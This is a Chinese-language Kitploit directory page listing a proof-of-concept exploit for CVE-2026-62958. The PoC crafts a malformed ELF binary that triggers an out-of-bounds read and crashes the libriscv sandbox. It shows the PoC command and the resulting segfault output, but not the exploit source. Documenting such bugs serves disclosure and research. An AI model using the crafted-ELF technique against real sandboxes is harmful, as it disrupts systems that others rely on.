Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-62958 — CVE-2026-62958 的概念验证漏洞利用程序,演示了 Libriscv 沙箱中的越界读取漏洞,通过精心构造的 ELF 二进制文件导致沙箱崩溃。 | Kitploit
工具/GitHubGitHub/0linear/cve-2026-62958
内存取证漏洞分析漏洞利用模糊测试二进制利用
GitHub0linear/cve-2026-62958

CVE-2026-62958

CVE-2026-62958 的概念验证漏洞利用程序,演示了 Libriscv 沙箱中的越界读取漏洞,通过精心构造的 ELF 二进制文件导致沙箱崩溃。

查看仓库
1个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Libriscv 中存在一个漏洞,攻击者可以利用越界读取导致沙箱崩溃。

创建 Bad elf:

root@kitploit:~
python3 poc.py samplefile poisoned_file

结果:

root@kitploit:~
❯ python3 poc.py fib poisoned_file
Manipulating .text section header at offset 0x250
Manipulating .symtab section header at offset 0x710
❯ ./rvlinux poisoned_file 
fish: Job 1, './rvlinux poisoned_file' terminated by signal SIGSEGV (Address boundary error)
下载工具